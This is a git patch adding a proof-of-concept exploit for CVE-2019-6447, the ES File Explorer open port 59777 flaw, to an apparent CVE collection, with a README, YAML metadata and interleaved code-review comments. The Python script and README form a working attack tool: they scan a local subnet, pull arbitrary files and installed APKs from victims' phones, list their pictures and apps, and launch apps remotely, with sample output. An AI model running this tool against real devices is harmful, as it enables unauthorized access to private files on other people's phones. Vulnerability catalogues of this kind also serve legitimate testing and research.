From 80ec3db4c4a28d49baa9e402dfe9a35801ab6fff Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E4=B9=94=E4=BD=B3=E6=96=87?=
Date: Mon, 20 Mar 2023 10:39:10 +0800
Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2019-6447?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../2019/CVE-2019-6447/CVE-2019-6447.py | 170 ++++++++++++++++++
 .../2019/CVE-2019-6447/README.md | 108 +++++++++++
 .../2019/yaml/CVE-2019-6447.yaml | 19 ++
 openkylin_list.yaml | 2 +
 4 files changed, 299 insertions(+)
 create mode 100644 cve/EsFileExplorer/2019/CVE-2019-6447/CVE-2019-6447.py
 create mode 100644 cve/EsFileExplorer/2019/CVE-2019-6447/README.md
 create mode 100644 cve/EsFileExplorer/2019/yaml/CVE-2019-6447.yaml
diff --git a/cve/EsFileExplorer/2019/CVE-2019-6447/CVE-2019-6447.py b/cve/EsFileExplorer/2019/CVE-2019-6447/CVE-2019-6447.py
new file mode 100644
index 00000000..69a55a1b
--- /dev/null
+++ b/cve/EsFileExplorer/2019/CVE-2019-6447/CVE-2019-6447.py
@@ -0,0 +1,170 @@
+import json
+import optparse
+import requests
+import sys
+
+from socket import *
+
+verbose = True
+
+
+def sanitize_json(json):
+    json = json.replace("\'", "\"")
+    json = json.split('[')[1].split(']')[0]
+    json = json[0:len(json)-6] + "}"
+    return json
+
+
+def get_file(addr, filepath):
+    if verbose:
+        print('[*] Getting file: ' + filepath + '\n\tfrom: ' + addr)
+    session = requests.Session()
+
+    headers = {"Content-Type": "application/json"}
+    address = 'http://' + addr + ':59777' + filepath
+    filename = filepath.rsplit('/', 1)[1]
+
+    resp = session.get(address, headers=headers, verify=False)
+    if verbose:
+        print('[*] Server responded with: ' + str(resp.status_code))
+    if resp and resp.status_code == 200:
+        if verbose:
+            print('[*] Writing to file: ' + filename)
+        with open(filename, 'wb') as f:
+            f.write(resp.content)
+
+
+def execute_cmd(addr, cmd, package):
+    if verbose:
+        print('[*] Executing command: ' + cmd + ' on ' + addr)
+
+    session = requests.Session()
+    headers = {"Content-Type": "application/json"}
+    address = 'http://' + addr + ':59777'
+
+    if package != '':
+        data = '{ "command":' + cmd + ', "appPackageName":' + package + ' }'
+    else:
+        data = '{ "command":' + cmd + ' }'
+
+    resp = session.post(address, headers=headers, data=data, verify=False)
+    if verbose:
+        print('[*] Server responded with: ' + str(resp.status_code))
+    if "NameNotFoundException" in resp.text:
+        print('[!] Package \'' + package + '\' not found!')
+        return
+    if cmd not in ('getDeviceInfo', 'appLaunch', 'listAppsSdcard', 'listVideos', 'listFiles'):
+        text = sanitize_json(resp.text)
+    else:
+        text = resp.text
+
+    if resp and resp.status_code == 200:
+        if cmd == 'getAppThumbnail':
+            if verbose:
+                print('[*] Getting app thumbnail: ' + package)
+            with open(package + ".jpg", 'wb') as f:
+                f.write(resp.content)
+        elif cmd == 'appPull':
+            if verbose:
+                print('[*] Pulling app: ' + package)
+            with open(package + ".apk", 'wb') as f:
+                f.write(resp.content)
+        else:
+            print(text)
+
+
+def is_up(addr):
+    s = socket(AF_INET, SOCK_STREAM)
+    s.settimeout(1)
+    if not s.connect_ex((addr, 59777)):
+        s.close()
+        return 1
+    else:
+        s.close()
+
+
+def show_available_cmds():
+    print('')
+    print('######################')
+    print('# Available Commands #')
+    print('######################')
+    print('')
+    print('listFiles: List all the files')
+    print('listPics: List all the pictures')
+    print('listVideos: List all the videos')
+    print('listAudios: List all the audio files')
+    print('listApps: List all the apps installed')
+    print('listAppsSystem: List all the system apps')
+    print('listAppsPhone: List all the phone apps')
+    print('listAppsSdcard: List all the apk files in the sdcard')
+    print('listAppsAll: List all the apps installed (system apps included)')
+    print('getDeviceInfo: Get device info. Package name parameter is needed')
+    print('appPull: Pull an app from the device')
+    print('appLaunch: Launch an app. Package name parameter is needed')
+    print('getAppThumbnail: Get the icon of an app. Package name parameter is needed')
+    print('')
+
+
+def set_up_menu():
+    parser = optparse.OptionParser()
+
+    parser.add_option('-g', '--get-file',
+                      action="store", dest="filepath",
+                      help="Get file path", default="")
+    parser.add_option('-c', '--cmd',
+                      action="store", dest="cmd",
+                      help="Command to execute", default="")
+    parser.add_option('-p', '--pkg',
+                      action="store", dest="package",
+                      help="Package name", default="")
+    parser.add_option('--ip', '--host',
+                      action="store", dest="host",
+                      help="Target host IP", default="")
+    parser.add_option('-n', '--network',
+                      action="store", dest="network",
+                      help="Network to scan", default="192.168.0.")
+    parser.add_option('-v', '--verbose',
+                      action="store_true", dest="verb",
+                      help="Loud stdout")
+
+    return parser.parse_args()
+
+
+def main():
+    options, _ = set_up_menu()
+    verbose = options.verb
+
+    if len(sys.argv) > 1 and sys.argv[1] == 'list':
+        show_available_cmds()
+    elif options.filepath != '' or options.cmd != '':
+        def scan_host(addr):
+            if verbose:
+                print('[*] Checking address: ' + addr)
+
+            if is_up(addr):
+                if verbose:
+                    print('[+] Address is up: ' + addr)
+
+                if options.filepath != '':
+                    get_file(addr, options.filepath)
+                elif options.cmd != '':
+                    execute_cmd(addr, options.cmd, options.package)
+
+        if options.host != '':
+            scan_host(options.host)
+        else:
+            for ip in range(0, 255):
+                scan_host(options.network + str(ip))
+    else:
+        print('Usage:')
+        print('- python3 poc.py list')
+        print('- python3 poc.py --get-file [filepath]')
+        print('- python3 poc.py --cmd [cmd]')
+        print('- python3 poc.py --cmd [cmd] --host [target_host]')
+        print('- python3 poc.py --cmd [cmd] --network [network]')
+        print('- python3 poc.py --cmd [cmd] --pkg [package_name]')
+        print('- python3 poc.py --verbose --cmd [cmd] --pkg [package_name]')
+
+
+if __name__ == '__main__':
+    main()
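Review bot: `verbose = options.verb` in `main()` binds a local name instead of the module-level `verbose = True`, so `get_file` and `execute_cmd` always print at full verbosity and `-v` only governs the messages inside the nested `scan_host`; add `global verbose` as the first statement of `main()` and assign `verbose = bool(options.verb)`, since a `store_true` option left unset is `None`. `sanitize_json` does `json.split('[')[1]` unconditionally and `execute_cmd` calls it before checking `status_code`, so any body without a `[` (an error page, an empty listing) raises IndexError instead of being reported; a guard such as `if '[' not in json: return json` at the top of `sanitize_json` avoids the crash. The parameter `json` in `sanitize_json` shadows the `json` module imported on the first line, which the file otherwise never uses; renaming the parameter (e.g. `raw`) removes the ambiguity. The help text in `show_available_cmds` says `getDeviceInfo` needs a package name and `appPull` does not, while the `appPull` branch of `execute_cmd` writes `package + ".apk"` and the README states the opposite; the two `print` lines should be swapped to match the code.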
diff --git a/cve/EsFileExplorer/2019/CVE-2019-6447/README.md b/cve/EsFileExplorer/2019/CVE-2019-6447/README.md
new file mode 100644
index 00000000..cd5b30c3
--- /dev/null
+++ b/cve/EsFileExplorer/2019/CVE-2019-6447/README.md
@@ -0,0 +1,108 @@
+# ES File Explorer Open Port Vulnerability - CVE-2019-6447
+As per their Google Play description:
+> ES File Explorer (File Manager) is a full-featured file (Images, Music, Movies, Documents, app) manager for both local and networked use! With over 500 million users worldwide, ES File Explorer (File Manager) helps manage your android phone and files efficiently and effectively and share files without data cost.
+
+Everytime a user is launching the app, a HTTP server is started. This server is opening locally the port 59777:
+```console
+angler:/ # netstat -ap | grep com.estrongs
+tcp6 0 0 :::59777 :::* LISTEN 5696/com.estrongs.android.pop
+```
+
+On this port, an attacker can send a JSON payload to the target
+```console
+curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777
+```
+
+These commands allow an attacker **connected on the same local network to the victim**, to obtain a lot of juicy information (device info, app installed, ...) about the victim's phone, **remotely get a file** from the victim's phone and **remotely launch an app** on the victim's phone.
+
+## Affected Versions
+4.1.9.7.4 and below
+
+## POC Features
+With the following Proof Of Concept (POC), you can:
+- List all the files in the sdcard in the victim device
+- List all the pictures in the victim device
+- List all the videos in the victim device
+- List all the audio files in the victim device
+- List all the apps installed in the victim device
+- List all the system apps installed in the victim device
+- List all the phone apps installed in the victim device
+- List all the apk files stored in the sdcard of the victim device
+- List all the apps installed in the victim device
+- Get device info of the victim device
+- Pull a file from the victim device
+- Launch an app of your choice
+- Get the icon of an app of your choice
+
+## Demo
+[![Demo](http://img.youtube.com/vi/z6hfgnPNBRE/0.jpg)](http://www.youtube.com/watch?v=z6hfgnPNBRE)
+
+## How To
+```console
+$ python poc.py -g /sdcard/Android/media/com.google.android.talk/Ringtones/hangouts_incoming_call.ogg
+
+$ python poc.py --cmd appPull --pkg com.tencent.mm
+
+$ python poc.py --cmd getAppThumbnail --pkg com.tencent.mm
+
+$ python poc.py --cmd appLaunch --pkg com.tencent.mm
+{"result":"0"}
+
+$ python poc.py --cmd getDeviceInfo
+{"name":"Nexus 6P", "ftpRoot":"/sdcard", "ftpPort":"3721"}
+
+$ python poc.py --cmd listAppsAll
+{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"},
+{"packageName":"com.android.cts.priv.ctsshim", "label":"com.android.cts.priv.ctsshim", "version":"8.1.0-4396705", "versionCode":"27", "location":"/system/priv-app/CtsShimPrivPrebuilt/CtsShimPrivPrebuilt.apk", "size":"22744", "status":"null", "mTime":"1230796800000"}
+
+$ python poc.py --cmd listAppsPhone
+{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"}
+
+$ python poc.py --cmd listAppsSystem
+{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"}
+
+$ python poc.py --cmd listApps
+{"packageName":"com.google.android.youtube", "label":"YouTube", "version":"13.50.52", "versionCode":"1350523400", "location":"/data/app/com.google.android.youtube-hg9X1FaylPbUXO1SaiFtkg==/base.apk", "size":"36860368", "status":"com.google.android.apps.youtube.app.application.backup.YouTubeBackupAgent", "mTime":"1545337705957"}
+
+$ python poc.py --cmd listAppsSdcard
+
+$ python poc.py --cmd listAudios
+{"name":"hangouts_incoming_call.ogg", "time":"10/17/18 11:33:16 PM", "location":"/storage/emulated/0/Android/media/com.google.android.talk/Ringtones/hangouts_incoming_call.ogg", "duration":5000, "size":"74.63 KB (76,425 Bytes)", }
+
+$ python poc.py --cmd listPics
+{"name":"mmexport1546422097497.jpg", "time":"1/2/19 10:41:37 AM", "location":"/storage/emulated/0/tencent/MicroMsg/WeChat/mmexport1546422097497.jpg", "size":"38.80 KB (39,734 Bytes)", }
+
+$ python poc.py --cmd listVideos
+
+$ python poc.py --cmd listFiles
+
+$ python poc.py --cmd listFiles --network 192.168.1.
+
+$ python poc.py --cmd listFiles --ip 192.168.4.17
+
+$ python poc.py list
+
+######################
+# Available Commands #
+######################
+
+listFiles: List all the files
+listPics: List all the pictures
+listVideos: List all the videos
+listAudios: List all the audio files
+listApps: List all the apps installed
+listAppsSystem: List all the system apps
+listAppsPhone: List all the phone apps
+listAppsSdcard: List all the apk files in the sdcard
+listAppsAll: List all the apps installed (system apps included)
+getDeviceInfo: Get device info
+appPull: Pull an app from the device. Package name parameter is needed
+appLaunch: Launch an app. Package name parameter is needed
+getAppThumbnail: Get the icon of an app. Package name parameter is needed
+```
+
+## Contact
+Follow me on [Twitter](https://twitter.com/fs0c131y)! You can also find a small part of my work at [https://fs0c131y.com](https://fs0c131y.com)
+
+## Credits
+Following a tip from [@moonbocal](https://twitter.com/moonbocal), the investigation and the POC has been made with ❤️ by @fs0c131y
diff --git a/cve/EsFileExplorer/2019/yaml/CVE-2019-6447.yaml b/cve/EsFileExplorer/2019/yaml/CVE-2019-6447.yaml
new file mode 100644
index 00000000..b792cc07
--- /dev/null
+++ b/cve/EsFileExplorer/2019/yaml/CVE-2019-6447.yaml
@@ -0,0 +1,19 @@
+id: CVE-2019-6447
+source: https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
+info:
+  name: ES 文件资源管理器(文件管理器)是一个功能齐全的文件(图像、音乐、电影、文档、应用程序)管理器,适用于本地和网络使用!ES File Explorer(文件管理器)在全球拥有超过 5 亿用户,可帮助您高效、有效地管理您的 Android 手机和文件,并在没有数据成本的情况下共享文件。
+  severity: high
+  description: |
+    通过4.1.9.7.4的ES文件资源管理器文件管理器应用程序允许远程攻击者在本地Wi-Fi网络上通过TCP端口59777请求读取任意文件或执行应用程序。这个TCP端口在ES应用程序启动一次后仍然打开,并通过HTTP响应未经身份验证的应用程序/json数据。
+  scope-of-influence:
+    ES File Explorer 4.1.9.7.4
+  reference:
+    - https://nvd.nist.gov/vuln/detail/cve-2019-6447
+  classification:
+    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 8.1
+    cve-id: CVE-2019-6447
+    cwe-id: CWE-306
+    cnvd-id:None
+    kve-id:None
+  tags: ES File Explorer,TCP,HTTP
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index cae1e168..b019aff4 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -117,6 +117,8 @@ cve:
   - CVE-2021-3537
   fortinac:
   - CVE-2022-39952
+  EsFileExplorer:
+  - CVE-2019-6447
   redis:
   - CVE-2022-31144
   java-spring:
-- Gitee
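Review bot: `cnvd-id:None` and `kve-id:None` under `classification` have no space after the colon, so a YAML loader does not see them as keys — a bare scalar line inside a block mapping is likely a parse error for strict loaders such as PyYAML; write `cnvd-id: None` and `kve-id: None` like the neighbouring entries. `info.name` carries the app's store description instead of a short name for the record, which makes the entry hard to scan in a list; a one-line name (e.g. `name: ES File Explorer open port 59777 unauthenticated file read / app launch`) would serve better. In `description`, `通过4.1.9.7.4` renders NVD's "through 4.1.9.7.4" as "via 4.1.9.7.4", which changes the meaning; `4.1.9.7.4及之前版本` matches the `scope-of-influence` line and the README's "4.1.9.7.4 and below".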